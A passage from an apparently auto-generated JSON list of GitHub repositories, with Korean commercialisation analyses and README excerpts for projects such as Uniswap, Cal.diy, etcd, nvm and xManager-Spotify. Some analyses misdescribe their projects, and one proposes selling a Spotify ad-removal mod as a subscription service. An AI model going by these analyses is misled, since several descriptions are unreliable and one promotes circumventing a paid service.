浏览器里直接写代码、自动判分、做对一题解锁下一题，跟着练就能上手\n> - **文档版**（推荐系统通读 / 速查）：[https://walter201230.github.io/Python/](https://walter201230.github.io/Python/) —— 纯阅读形态，章节齐全可整本翻，手机也好看\n\n\n\n# 2026 更新说明\n\n2026 年是 AI 编程的普及年，在这一年，我深切感受到 AI 编程的强大，以前我们手敲代码的年代估计一去不复返，现在手敲代码还被互联网称为古法编程，短短几年，变化如此的快，我是完全没想到的。\n\nAI 时代，我以为这个课程不会再有人看了，但没想到这个教程依然每天保持着稳定的增长，于是我用 AI 把我这个项目全面更新了一下。\n\n更新完了全部教程内容之后，我用 AI 做了一个网站，更方便大家学习，不过为了省成本，我这个是静态网站，该有的功能都有，该有的体验也有，只是没法做到跨设备保存你学习的记录而已。\n\n这个网站的地址是：https://learn-py.org\n\n这是一个升级打怪学习 Python 基础知识的网站，你在浏览器里就可以写代码，一题一题练。代码当场跑、判分秒回，做对一题解锁下一题。截几张图给大家感受下：\n\n首页：会记录你的学习进度\n\n![image-20260507173345449](./images/image-20260507173345449.png)\n\n课程内容：每","composite_score":0.2014,"license_safety_tag":"unknown"},{"name":"Uniswap/uniswap-interface","github_url":"https://github.com/Uniswap/uniswap-interface","stars":5,"language":"TypeScript","license":"GPL-3.0","abandonment_months":0,"description":"# Uniswap Interface 저장소 분석\n\n## 왜 보물인가\n암호화폐 거래소 중 가장 큰 규모인 유니스왑의 공식 인터페이스 코드로, 블록체인 금융 시장에서 검증된 기술을 보유하고 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 암호화폐 거래 플랫폼 SaaS**\n- 중소 암호화폐 거래소가 자신만의 거래 인터페이스를 만들 때 구매하여 빠르게 서비스 시작","readme_excerpt":"# Uniswap Labs: Front End Interfaces\n\nThis is the **public** repository for Uniswap Labs’ front-end interfaces, including the Web App, Wallet Mobile App, and Wallet Extension. Uniswap is a protocol for decentralized exchange of Ethereum-based assets.\n\n## Interfaces\n\n- Web: [app.uniswap.org](https://app.uniswap.org)\n- Wallet (mobile + extension): [wallet.uniswap.org](https://wallet.uniswap.org)\n\n## Install & Apps\n\n```bash\ngit clone git@github.com:Uniswap/interface.git\nbun install\nbun lfg\nbun web start\n```\n\nFor instructions per application or package, see the README published for each application:\n\n- [Web](apps/web/README.md)\n- [Mobile](apps/mobile/README.md)\n- [Extension](apps/extension/README.md)\n\n## Contributing\n\nFor instructions on the best way to contribute, please review our [Contributing guide](CONTRIBUTING.md)!\n\n## Socials / Contact\n\n- X (Formerly Twitter): [@Uniswap](https://x.com/Uniswap)\n- Reddit: [/r/Uniswap](https://www.reddit.com/r/Uniswap/)\n- Email: [contact@uniswap.org](m","composite_score":0.2014,"license_safety_tag":"restricted"},{"name":"calendso/calendso","github_url":"https://github.com/calendso/calendso","stars":28,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"# Calendso 저장소 분석\n\n## 왜 보물인가\n일정 관리와 예약을 자동화하는 '달력 예약 시스템'으로, 업무 효율을 크게 높일 수 있는 핵심 인프라입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 프리랜서나 소규모 사업가를 위한 온라인 예약 플랫폼 (미용실, 컨설턴트, 튜터 등이 고객 예약을 자동으로 받기)\n2. **내부 업무 도구**","readme_excerpt":"> [!WARNING]  \n> Use at your own risk. Cal.diy is the open source community edition of Cal.com and it is intended for users who want to self-host their own Cal.diy instance. It is strictly recommended for personal, non-production use. Please review all installation and configuration steps carefully. Self-hosting requires advanced knowledge of server administration, database management, and securing sensitive data. Proceed only if you are comfortable with these responsibilities.\n\n> [!TIP]\n> For any commercial and enterprise-ready scheduling infrastructure, use Cal.com, not Cal.diy; hosted by us or get invited to on-prem enterprise access here: <a href=\"https://cal.com/sales\">https://cal.com/sales</a>\n\n<!-- PROJECT LOGO -->\n<p align=\"center\">\n  <a href=\"https://github.com/calcom/cal.diy\">\n   <img src=\"https://user-images.githubusercontent.com/8019099/210054112-5955e812-a76e-4160-9ddd-58f2c72f1cce.png\" alt=\"Logo\">\n  </a>\n\n  <h3 align=\"center\">Cal.diy</h3>\n\n  <p align=\"center\">\n    The com","composite_score":0.2014,"license_safety_tag":"safe"},{"name":"zhangdaiscott/jeecg-boot","github_url":"https://github.com/zhangdaiscott/jeecg-boot","stars":20,"language":"Java","license":"apache-2.0","abandonment_months":0,"description":"# jeecg-boot 저장소 분석\n\n## 왜 보물인가\n기업의 업무 관리 시스템을 빠르게 만들 수 있는 '레고 블록' 같은 기본 도구 모음입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 중소 기업용 인사관리·급여 관리 클라우드 서비스로 매달 구독료 수집\n2. **내부 업무 도구**: 대기업의 결재 시스템, 재고 관리, 직원 데이터 관리 ","readme_excerpt":"中文 | [English](./README.en-US.md) | [日本語](./README.ja-JP.md)\n\nJeecgBoot AI低代码平台\n===============\n\n🚀 **低代码迈入 v2.0 时代，一句自然语言即可生成整个系统**\n\n当前最新版本： 3.9.2（2026-04-30） \n\n\n[![AUR](https://img.shields.io/badge/license-Apache%20License%202.0-blue.svg)](https://github.com/jeecgboot/JeecgBoot/blob/master/LICENSE)\n[![](https://img.shields.io/badge/Author-北京国炬软件-orange.svg)](https://jeecg.com)\n[![](https://img.shields.io/badge/blog-技术博客-orange.svg)](https://www.toutiao.com/c/user/token/CiZtC9Gn_yl2qDcTF9Kqhh9LV7tW1cJsdRn2rfFUU5lZy4RJaD4hdBpJCjwAAAAAAAAAAAAAUFvsvy4j57fg5tqwVmxukKxGEhbMl7pE14lY9_YSDq-A26V7xrG3hYuq_Z9y6F3W01oQkIKQDhjDxYPqBCIBA2iiHh0=)\n[![](https://img.shields.io/badge/version-3.9.2-brightgreen.svg)](https://github.com/jeecgboot/JeecgBoot)\n[![GitHub stars](https://img.shields.io/github/stars/zhangdaiscott/jeecg-boot.svg?style=social&label=Stars)](https://github.com/jeecgboot/JeecgBoot)\n[![GitHub forks](https://img.shields.io/github/forks/zhangdaiscott/jeecg-boot.svg?style=social&label=For","composite_score":0.2014,"license_safety_tag":"safe"},{"name":"reactjs/reactjs.org","github_url":"https://github.com/reactjs/reactjs.org","stars":6,"language":"JavaScript","license":"CC-BY-4.0","abandonment_months":0,"description":"# React.js 공식 문서 저장소 분석\n\n## 왜 보물인가\n전 세계 웹 개발자들이 가장 많이 사용하는 React 기술의 공식 학습 자료이며, 지속적으로 업데이트되고 있는 신뢰할 수 있는 교육 콘텐츠입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: React 초보자부터 고급자까지 단계별 학습 콘텐츠를 제공하는 구독형 교육 서비스\n2. ","readme_excerpt":"# react.dev\n\nThis repo contains the source code and documentation powering [react.dev](https://react.dev/).\n\n## Getting started\n\n### Prerequisites\n\n1. Git\n1. Node: any version starting with v16.8.0 or greater\n1. Yarn: See [Yarn website for installation instructions](https://yarnpkg.com/lang/en/docs/install/)\n1. A fork of the repo (for any contributions)\n1. A clone of the [react.dev repo](https://github.com/reactjs/react.dev) on your local machine\n\n### Installation\n\n1. `cd react.dev` to go into the project root\n3. `yarn` to install the website's npm dependencies\n\n### Running locally\n\n1. `yarn dev` to start the development server (powered by [Next.js](https://nextjs.org/))\n1. `open http://localhost:3000` to open the site in your favorite browser\n\n## Contributing\n\n### Guidelines\n\nThe documentation is divided into several sections with a different tone and purpose. If you plan to write more than a few sentences, you might find it helpful to get familiar with the [contributing guidelines](h","composite_score":0.2014,"license_safety_tag":"unknown"},{"name":"mirumee/saleor","github_url":"https://github.com/mirumee/saleor","stars":8,"language":"Python","license":"BSD-3-Clause","abandonment_months":0,"description":"# Saleor 저장소 분석\n\n## 왜 보물인가\n온라인 쇼핑몰을 만들고 운영하기 위한 모든 기능(상품 관리, 결제, 배송 등)이 한 곳에 담긴 오픈소스 플랫폼입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 개인 사업자와 중소 쇼핑몰을 위한 월간 구독형 전자상거래 호스팅 서비스\n- **내부 업무 도구**: 대형 유통사나 백화점의 상품 재고 관","readme_excerpt":"<div align=\"center\" width=\"100px\">\n\n <picture>\n   <source media=\"(prefers-color-scheme: dark)\" srcset=\"https://github.com/user-attachments/assets/76e3079f-696a-4fcd-8658-89739647090b\">\n   <source media=\"(prefers-color-scheme: light)\" srcset=\"https://github.com/user-attachments/assets/8477d643-a905-4c63-8ed3-03d0976f6fc3\">\n   <img width=\"200\" alt=\"saleor-commerce-logo\" src=\"https://user-images.githubusercontent.com/4006792/214636328-8e4f83e8-66cb-4114-a3d8-473eb908b9c3.png\">\n\n </picture>\n</div>\n\n<div align=\"center\">\n  <strong>Commerce that works with your language and stack</strong>\n</div>\n\n<div align=\"center\">\n  GraphQL native, API-only platform for scalable composable commerce.\n</div>\n\n<br>\n\n<div align=\"center\">\n Get to know Saleor: <br>\n  <a href=\"https://saleor.io/cloud/talk-to-us?utm_source=github&utm_medium=readme&utm_campaign=repo_saleor\">Talk to a human</a>\n  <span> | </span>\n  <a href=\"https://cloud.saleor.io/signup?utm_source=github&utm_medium=readme&utm_campaign=repo_saleor\">","composite_score":0.2014,"license_safety_tag":"safe"},{"name":"coreos/etcd","github_url":"https://github.com/coreos/etcd","stars":17,"language":"Go","license":"apache-2.0","abandonment_months":0,"description":"# etcd 저장소 분석\n\n## 왜 보물인가\n수백만 개의 서버를 관리하는 대규모 회사들이 필수적으로 사용하는 핵심 데이터 저장 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 서비스 제공 업체**: 고객 서버 설정을 안정적으로 보관·관리하는 백엔드 시스템\n2. **기업용 IT 관리 솔루션**: 수천 개 사무실의 컴퓨터 설정을 중앙에서 통제하는 도구","readme_excerpt":"# etcd\n\n[![Go Report Card](https://goreportcard.com/badge/github.com/etcd-io/etcd?style=flat-square)](https://goreportcard.com/report/github.com/etcd-io/etcd)\n[![Coverage](https://codecov.io/gh/etcd-io/etcd/branch/main/graph/badge.svg)](https://app.codecov.io/gh/etcd-io/etcd/tree/main)\n[![Tests](https://github.com/etcd-io/etcd/actions/workflows/tests.yaml/badge.svg)](https://github.com/etcd-io/etcd/actions/workflows/tests.yaml)\n[![codeql-analysis](https://github.com/etcd-io/etcd/actions/workflows/codeql-analysis.yml/badge.svg)](https://github.com/etcd-io/etcd/actions/workflows/codeql-analysis.yml)\n[![Docs](https://img.shields.io/badge/docs-latest-green.svg)](https://etcd.io/docs)\n[![Godoc](http://img.shields.io/badge/go-documentation-blue.svg?style=flat-square)](https://godocs.io/go.etcd.io/etcd/v3)\n[![Releases](https://img.shields.io/github/release/etcd-io/etcd/all.svg?style=flat-square)](https://github.com/etcd-io/etcd/releases)\n[![LICENSE](https://img.shields.io/github/license/etcd-","composite_score":0.2012,"license_safety_tag":"safe"},{"name":"ecomfe/echarts","github_url":"https://github.com/ecomfe/echarts","stars":46,"language":"TypeScript","license":"apache-2.0","abandonment_months":0,"description":"# ECharts 저장소 분석\n\n## 왜 보물인가\n복잡한 데이터를 아름다운 그래프와 차트로 시각화해주는 오픈소스 도구로, 전 세계 수천 개 회사의 대시보드와 분석 화면에서 활용되고 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 데이터 분석 SaaS 서비스**\n- 고객사의 판매량, 사용자 추이 등을 대시보드로 보여주는 분석 플랫폼에 내장\n\n**2. 기업 내","readme_excerpt":"# Apache ECharts\n\n<a href=\"https://echarts.apache.org/\">\n    <img style=\"vertical-align: top;\" src=\"./asset/logo.png?raw=true\" alt=\"logo\" height=\"50px\">\n</a>\n\nApache ECharts is a free, powerful charting and visualization library offering easy ways to add intuitive, interactive, and highly customizable charts to your commercial products. It is written in pure JavaScript and based on <a href=\"https://github.com/ecomfe/zrender\">zrender</a>, which is a whole new lightweight canvas library.\n\n**[中文官网](https://echarts.apache.org/zh/index.html)** | **[ENGLISH HOMEPAGE](https://echarts.apache.org/en/index.html)**\n\n[![License](https://img.shields.io/npm/l/echarts?color=5470c6)](https://github.com/apache/echarts/blob/master/LICENSE) [![Latest npm release](https://img.shields.io/npm/v/echarts?color=91cc75)](https://www.npmjs.com/package/echarts) [![NPM downloads](https://img.shields.io/npm/dm/echarts.svg?label=npm%20downloads&style=flat&color=fac858)](https://www.npmjs.com/package/echarts) [![Cont","composite_score":0.2012,"license_safety_tag":"safe"},{"name":"almasaeed2010/AdminLTE","github_url":"https://github.com/almasaeed2010/AdminLTE","stars":11,"language":"CSS","license":"mit","abandonment_months":0,"description":"# AdminLTE 저장소 분석\n\n## 왜 보물인가\n관리자 화면을 쉽게 만들 수 있는 준비된 디자인 틀로, 회사 업무 관리 사이트나 대시보드가 필요한 누구나 빠르게 시작할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 고객 관리, 매출 통계를 보여주는 기업 대시보드 서비스로 판매\n- **내부 업무 도구**: 회사 직원들이 일일 업무 ","readme_excerpt":"# [AdminLTE - Bootstrap 5 Admin Dashboard](https://adminlte.io)\n\n[![npm version](https://img.shields.io/npm/v/admin-lte/latest.svg)](https://www.npmjs.com/package/admin-lte)\n[![Packagist](https://img.shields.io/packagist/v/almasaeed2010/adminlte.svg)](https://packagist.org/packages/almasaeed2010/adminlte)\n[![cdn version](https://data.jsdelivr.com/v1/package/npm/admin-lte/badge)](https://www.jsdelivr.com/package/npm/admin-lte)\n[![Discord Invite](https://img.shields.io/badge/discord-join%20now-green)](https://discord.gg/jfdvjwFqfz)\n[![Netlify Status](https://api.netlify.com/api/v1/badges/1277b36b-08f3-43fa-826a-4b4d24614b3c/deploy-status)](https://app.netlify.com/sites/adminlte-v4/deploys)\n\n**AdminLTE** is a fully responsive administration template. Based on **[Bootstrap 5](https://getbootstrap.com/)** framework and also the JavaScript plugins.\nHighly customizable and easy to use. Fits many screen resolutions from small mobile devices to large desktops.\n\n## What's New in v4.0.0-rc7\n\n**Bu","composite_score":0.2012,"license_safety_tag":"safe"},{"name":"QingWei-Li/docsify","github_url":"https://github.com/QingWei-Li/docsify","stars":6,"language":"JavaScript","license":"mit","abandonment_months":0,"description":"# docsify 저장소 분석\n\n## 왜 보물인가\n웹사이트 없이도 간단한 문서 파일만으로 전문적인 온라인 설명서를 자동으로 만들어주는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 소프트웨어 회사들이 고객용 사용 설명서와 API 문서를 빠르게 게시할 수 있습니다.\n2. **내부 업무 도구**: 회사의 운영 매뉴얼, 직원 교육 자료,","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://docsify.js.org\">\n    <img alt=\"docsify\" src=\"./docs/_media/icon.svg\">\n  </a>\n</p>\n\n<p align=\"center\">\n  A magical documentation site generator.\n</p>\n\n<p align=\"center\">\n  <a href=\"#backers\"><img alt=\"Backers on Open Collective\" src=\"https://opencollective.com/docsify/backers/badge.svg?style=flat-square\"></a>\n  <a href=\"#sponsors\">\n    <img alt=\"Sponsors on Open Collective\" src=\"https://opencollective.com/docsify/sponsors/badge.svg?style=flat-square\"></a>\n  <a href=\"https://github.com/docsifyjs/docsify/actions/workflows/test.yml\"><img src=\"https://github.com/docsifyjs/docsify/actions/workflows/test.yml/badge.svg\" alt=\"Build & Test\"></a>\n  <a href=\"https://www.npmjs.com/package/docsify\"><img alt=\"npm\" src=\"https://img.shields.io/npm/v/docsify.svg?style=flat-square\"></a>\n  <a href=\"https://discord.gg/3NwKFyR\"><img alt=\"Join Discord community and chat about Docsify\" src=\"https://img.shields.io/discord/713647066802421792.svg?label=&logo=discord&logoColo","composite_score":0.2012,"license_safety_tag":"safe"},{"name":"TinkoffCreditSystems/ng-polymorpheus","github_url":"https://github.com/TinkoffCreditSystems/ng-polymorpheus","stars":5,"language":"TypeScript","license":"Apache-2.0","abandonment_months":0,"description":"# ng-polymorpheus 평가 분석\n\n## 왜 보물인가\n웹 개발에서 다양한 형태의 콘텐츠를 한 곳에서 유연하게 처리할 수 있는 기술로, 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **대시보드 SaaS 서비스**: 고객사별로 다양한 형태의 데이터 표시 위젯을 자유롭게 조합·커스터마이징하는 분석 플랫폼\n2. **전자상거래 관","readme_excerpt":"# Polymorpheus\n\n[![npm version](https://img.shields.io/npm/v/@taiga-ui/polymorpheus.svg)](https://npmjs.com/package/@taiga-ui/polymorpheus)\n[![Coverage Status](https://codecov.io/gh/taiga-family/ng-polymorpheus/branch/master/graphs/badge.svg)](https://app.codecov.io/gh/taiga-family/ng-polymorpheus/tree/master/projects)\n[![angular-open-source-starter](https://img.shields.io/badge/made%20with-angular--open--source--starter-d81676?logo=angular)](https://github.com/taiga-family/angular-open-source-starter)\n[![telegram chat](https://img.shields.io/badge/support-Contact%20us-blue)](https://t.me/taiga_ui)\n\n**Polymorpheus** is a tiny library for polymorphic templates in Angular.\n\nIt is 1 KB gzip, dependency free and allows you to make pretty cool things.\n\n![Polymorpheus](projects/demo/assets/logo.svg)\n\n## What does it do?\n\nIt abstracts over different ways of view customization in Angular with one simple _structural directive_:\n\n```html\n<ng-container *polymorpheusOutlet=\"content as text; contex","composite_score":0.201,"license_safety_tag":"safe"},{"name":"xManager-v2/xManager-Spotify","github_url":"https://github.com/xManager-v2/xManager-Spotify","stars":14,"language":"Java","license":"GPL-3.0","abandonment_months":9,"description":"# xManager-Spotify 상용화 분석\n\n## 왜 보물인가\n스포티파이 음악 앱을 더 편하게 사용할 수 있도록 개선해주는 도구로, 음악 스트리밍 서비스 이용자들이 원하는 기능을 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 유료 구독 모델로 월정액을 받고 스포티파이 고급 기능(광고 제거, 맞춤 플레이리스트 자동생성 등)을 제공\n","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://www.xmanagerapp.com/\"><img width=\"200\" src=\"https://i.ibb.co/64bJncy/xmanger.gif\">\n</p>\n\n### <p align=\"center\">AD-FREE | NEW FEATURES | FREEDOM</p>\n\n<div align=\"center\">\n\n| **Status** | <img src=\"https://img.shields.io/github/release-date/xManager-App/xManager?label=UPDATED%20SINCE&style=for-the-badge\"></br><img src=\"https://img.shields.io/github/v/tag/xManager-App/xManager?label=LATEST%20VERSION&style=for-the-badge\"> |\n| :-------------: | :-------------: |\n| **Download Milestone** | **<img src=\"https://img.shields.io/github/downloads/xManager-App/xManager/total?label=DAWN%20(ACTIVE)&style=for-the-badge\"></br><img src=\"https://img.shields.io/badge/OMNIBUS%20(SHUTDOWN)-7.3M-red.svg?style=for-the-badge\"></br><img src=\"https://img.shields.io/badge/ORIGINS%20(SHUTDOWN)-1.1M-red.svg?style=for-the-badge\"></br><img src=\"https://img.shields.io/badge/LEGACY%20(SHUTDOWN)-400K-red.svg?style=for-the-badge\">** |\n| **Miscellaneous** | **<a href=\"https://github.c","composite_score":0.201,"license_safety_tag":"restricted"},{"name":"SwifterSwift/SwifterSwift","github_url":"https://github.com/SwifterSwift/SwifterSwift","stars":6,"language":"Swift","license":"mit","abandonment_months":1,"description":"# SwifterSwift 상용화 분석 보고서\n\n## 왜 보물인가\niOS 앱 개발자들이 매번 반복해서 작성하는 기본 코드를 자동으로 만들어주는 도구로, 개발 시간을 획기적으로 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹 기반 코드 생성 플랫폼으로 iOS 개발자들에게 월 구독 서비스 제공\n2. **내부 업무 도구**: 대","readme_excerpt":"<p align=\"left\">\n  <img src=\"https://cdn.rawgit.com/SwifterSwift/SwifterSwift/master/Assets/logo.svg\" title=\"swifterSwift\">\n</p>\n\n[![Build Status](https://github.com/SwifterSwift/SwifterSwift/workflows/SwifterSwift/badge.svg?branch=master)](https://github.com/SwifterSwift/SwifterSwift/actions)\n[![Platforms](https://img.shields.io/badge/platforms-iOS%20%7C%20tvOS%20%7C%20macOS%20%7C%20watchOS%20%7C%20Linux-lightgrey.svg)](https://github.com/SwifterSwift/swifterSwift)\n[![Cocoapods](https://img.shields.io/cocoapods/v/SwifterSwift.svg)](https://cocoapods.org/pods/SwifterSwift)\n[![Carthage compatible](https://img.shields.io/badge/Carthage-Compatible-brightgreen.svg?style=flat)](https://github.com/Carthage/Carthage)\n[![SPM compatible](https://img.shields.io/badge/SPM-Compatible-brightgreen.svg?style=flat)](https://swift.org/package-manager/)\n[![Accio supported](https://img.shields.io/badge/Accio-supported-0A7CF5.svg?style=flat)](https://github.com/JamitLabs/Accio)\n[![codecov](https://codecov","composite_score":0.2009,"license_safety_tag":"safe"},{"name":"creationix/nvm","github_url":"https://github.com/creationix/nvm","stars":10,"language":"Shell","license":"mit","abandonment_months":0,"description":"# creationix/nvm 분석 리포트\n\n## 왜 보물인가\n웹 개발자들이 여러 버전의 프로그래밍 언어를 쉽게 전환할 수 있게 해주는 필수 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 교육 플랫폼**: 학생들이 다양한 버전으로 실습할 수 있는 클라우드 환경 제공\n2. **팀 협업 도구**: 회사별로 다른 버전을 사용할 때 자동으로 맞춰주는 설정","readme_excerpt":"<a href=\"https://github.com/nvm-sh/logos\">\n  <picture>\n    <source media=\"(prefers-color-scheme: dark)\" srcset=\"https://raw.githubusercontent.com/nvm-sh/logos/HEAD/nvm-logo-white.svg\" />\n    <img src=\"https://raw.githubusercontent.com/nvm-sh/logos/HEAD/nvm-logo-color.svg\" height=\"50\" alt=\"nvm project logo\" />\n  </picture>\n</a>\n\n\n# Node Version Manager [![Tests](https://github.com/nvm-sh/nvm/actions/workflows/tests-fast.yml/badge.svg?branch=master)][3] [![nvm version](https://img.shields.io/badge/version-v0.40.4-yellow.svg)][4] [![CII Best Practices](https://bestpractices.dev/projects/684/badge)](https://bestpractices.dev/projects/684)\n\n<!-- To update this table of contents, ensure you have run `npm install` then `npm run doctoc` -->\n<!-- START doctoc generated TOC please keep comment here to allow auto update -->\n<!-- DON'T EDIT THIS SECTION, INSTEAD RE-RUN doctoc TO UPDATE -->\n## Table of Contents\n\n- [Intro](#intro)\n- [About](#about)\n- [Installing and Updating](#installing-and-updatin","composite_score":0.2008,"license_safety_tag":"safe"},{"name":"Kickball/awesome-selfhosted","github_url":"https://github.com/Kickball/awesome-selfhosted","stars":18,"language":"","license":"NOASSERTION","abandonment_months":0,"description":"# Kickball/awesome-selfhosted 분석\n\n## 왜 보물인가\n개인이나 기업이 대형 클라우드 서비스에 의존하지 않고 자신의 컴퓨터에서 직접 서비스를 운영할 수 있도록 도와주는 오픈소스 소프트웨어들의 모음입니다.\n\n## 어디에 쓸 수 있나\n- **내부 업무 도구**: 중소기업이 자신의 서버에 프로젝트 관리, 파일 저장소, 이메일 시스템을 구축","readme_excerpt":"# Awesome-Selfhosted\n\n[![Awesome](_static/awesome.png)](https://github.com/sindresorhus/awesome) [![](https://github.com/awesome-selfhosted/awesome-selfhosted-data/actions/workflows/check-dead-links.yml/badge.svg)](https://github.com/awesome-selfhosted/awesome-selfhosted-data/issues/1) [![](https://github.com/awesome-selfhosted/awesome-selfhosted-data/actions/workflows/check-unmaintained-projects.yml/badge.svg)](https://github.com/awesome-selfhosted/awesome-selfhosted-data/issues/1) [![](https://img.shields.io/liberapay/goal/awesome-selfhosted?logo=liberapay)](https://liberapay.com/awesome-selfhosted/)\n\nSelf-hosting is the practice of hosting and managing applications on your own server(s) instead of consuming from [SaaSS](https://www.gnu.org/philosophy/who-does-that-server-really-serve.html) providers.\n\nThis is a list of [Free](https://en.wikipedia.org/wiki/Free_software) Software [network services](https://en.wikipedia.org/wiki/Network_service) and [web applications](https://en.wikip","composite_score":0.2008,"license_safety_tag":"unknown"},{"name":"BrunnerLivio/try","github_url":"https://github.com/BrunnerLivio/try","stars":36,"language":"JavaScript","license":"Apache-2.0","abandonment_months":0,"description":"# BrunnerLivio/try 저장소 분석\n\n## 왜 보물인가\n프로그래밍 학습자나 초보자들이 코드를 직접 실행해보고 배울 수 있는 실험 환경을 제공하는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 코딩 교육 플랫폼**: 학생들이 강의 영상과 함께 실시간으로 코드를 작성하고 결과를 확인하는 학습 환경\n2. **기업 신입사원 교육 도구**: 회사","readme_excerpt":"# :package: try\n\n**Quickly try out npm packages inside a container.**\n\n[![NPM Package](https://badge.fury.io/js/try-pkg.svg)](https://www.npmjs.com/package/try-pkg)\n![Dependencies](https://img.shields.io/david/BrunnerLivio/try.svg)\n[![Build Status](https://circleci.com/gh/BrunnerLivio/try.svg?style=svg)](https://circleci.com/gh/BrunnerLivio/try/tree/master)\n\n<img src=\"demo.gif\" width=\"500\" alt=\"Demo animation\"/>\n\n## Purpose\n\nAs a developer working with NodeJS you often stumble upon packages you quickly want to try out.\nInstalling these packages on your host system gets it polluted real quick.\n\n`try` tries to keep your host system clean while testing out npm packages.\nThis CLI tool quickly starts up a [Docker](https://www.docker.com/) container\nand installs your specified packages, so you can try them out!\n\n## Usage\n\nYou can print the usage by executing `try --help`.\n\n```shell\n\nUsage: try [options]\n\nQuickly try out npm packages inside a container\n\nOptions:\n  -V, --version              o","composite_score":0.2008,"license_safety_tag":"safe"},{"name":"byoungd/English-level-up-tips-for-Chinese","github_url":"https://github.com/byoungd/English-level-up-tips-for-Chinese","stars":16,"language":"","license":"unknown","abandonment_months":1,"description":"# English-level-up-tips-for-Chinese 분석\n\n## 왜 보물인가\n중국인 영어 학습자들을 위한 실용적인 팁과 노하우를 모아둔 자료로, 수백만 명의 잠재적 사용자가 필요로 하는 콘텐츠입니다.\n\n## 어디에 쓸 수 있나\n1. **영어 학습 플랫폼 SaaS**: 중국 학생들을 위한 맞춤형 영어 학습 앱으로 구독료를 받으며 판매\n2. **기","readme_excerpt":"[`简体中文`](docs/README.md) | [`English`](docs/en/README.md)\n\n谨以此献给我曾今的挚爱 `W.`\n\n> 我们每个人都生活在各自的过去中，人们会用一分钟的时间去认识一个人，用一小时的时间去喜欢一个人，再用一天的时间去爱上一个人，到最后呢，却要用一辈子的时间去忘记一个人。\n\n![](./docs/assets/my-love.png)\n\n# 项目介绍\n\nAn advanced guide to learn English which might benefit you a lot.\n\n[离谱的英语学习指南/英语学习教程](https://github.com/byoungd/English-level-up-tips)。\n\n## 推荐资源：ku0.com - 库\n\n如果你在使用本指南里的 AI 学习方案时，需要更稳定、可信的 AI 账户与接口资源，可以看看我们的产品：[ku0.com - 库](https://ku0.com)。\n\n`ku0.com` 是一个可信任 AI 资源库，可一站式获取 `ChatGPT`、`Claude`、`Gemini` 账户充值、成品号和号池资源。我们用 Token 质检和统一网关筛掉不稳定、掺水、冒名的中转服务，并通过可信账户资源、质检报告和接入记录，帮助你降低 AI 使用成本与采购风险。\n\n## 背景\n\n你好啊朋友，欢迎来到[离谱的英语学习指南](https://github.com/byoungd/English-level-up-tips)。\n\n当你的目光与这些文字相遇，我衷心希望，这不仅仅是一次攻克英语的艰苦征程，更是一场开启智慧之门的奇妙冒险。愿这方寸纸墨，化作你我心灵共鸣的琴弦，弹奏出语言学习的天籁妙音。\n\n时间回到 2017 年 7 月初，备考托福的女神`W.`问了我一个问题：**如何高效学习英语？**\n\n在我思考如何回答这个问题时，回想起我在大四一学期一次性考过 26 门课的经验（其中重修 19 门，当前学期 7 门），再加上本人`英语` 和 `语文` 两门学科曾**侥幸**在高考时摘得省第一（江苏卷），或许我勉强有资格提供一些`高效学习`的`小技巧`，权当抛砖引玉。\n\n与她交流了一番学习心得后，我惊讶于她在学习方面的热情竟是如此之高，同时也发现了她的学习方法存在一些`不","composite_score":0.2008,"license_safety_tag":"unknown"},{"name":"ctripcorp/apollo","github_url":"https://github.com/ctripcorp/apollo","stars":19,"language":"Java","license":"apache-2.0","abandonment_months":0,"description":"# Apollo 저장소 분석\n\n## 왜 보물인가\n대규모 시스템에서 설정 정보를 중앙에서 한 번에 관리할 수 있는 플랫폼으로, 회사의 서버 설정을 쉽게 제어하고 업데이트할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n**1. 설정 관리 SaaS 서비스**\n- 수백 개의 마이크로서비스를 운영하는 기업들을 위해 구독료 기반으로 중앙 제어 플랫폼 제공\n\n**2","readme_excerpt":"<img src=\"https://cdn.jsdelivr.net/gh/apolloconfig/apollo@master/doc/images/logo/logo-simple.png\" alt=\"apollo-logo\" width=\"40%\">\n\nEnglish | [中文](https://www.apolloconfig.com/#/zh/README)\n\n# Apollo - A reliable configuration management system\n\n[![Build Status](https://github.com/apolloconfig/apollo/workflows/build/badge.svg)](https://github.com/apolloconfig/apollo/actions)\n[![GitHub Release](https://img.shields.io/github/release/apolloconfig/apollo.svg)](https://github.com/apolloconfig/apollo/releases)\n[![Maven Central Repo](https://img.shields.io/maven-central/v/com.ctrip.framework.apollo/apollo-client.svg)](https://mvnrepository.com/artifact/com.ctrip.framework.apollo/apollo-client)\n[![codecov.io](https://codecov.io/github/apolloconfig/apollo/coverage.svg?branch=master)](https://codecov.io/github/apolloconfig/apollo?branch=master)\n[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)\n[<img src=\"https://devin.ai/assets/deep","composite_score":0.2007,"license_safety_tag":"safe"},{"name":"KevinOConnor/klipper","github_url":"https://github.com/KevinOConnor/klipper","stars":6,"language":"C","license":"gpl-3.0","abandonment_months":0,"description":"# Klipper 저장소 분석\n\n## 왜 보물인가\n3D 프린터를 더 빠르고 정확하게 작동하게 해주는 오픈소스 소프트웨어로, 전 세계 3D 프린팅 애호가들이 널리 사용하고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **3D 프린팅 관리 SaaS**: 원격으로 여러 프린터를 모니터링하고 제어하는 클라우드 서비스\n2. **3D 프린터 제조사 펌웨어**: 자사 프","readme_excerpt":"Welcome to the 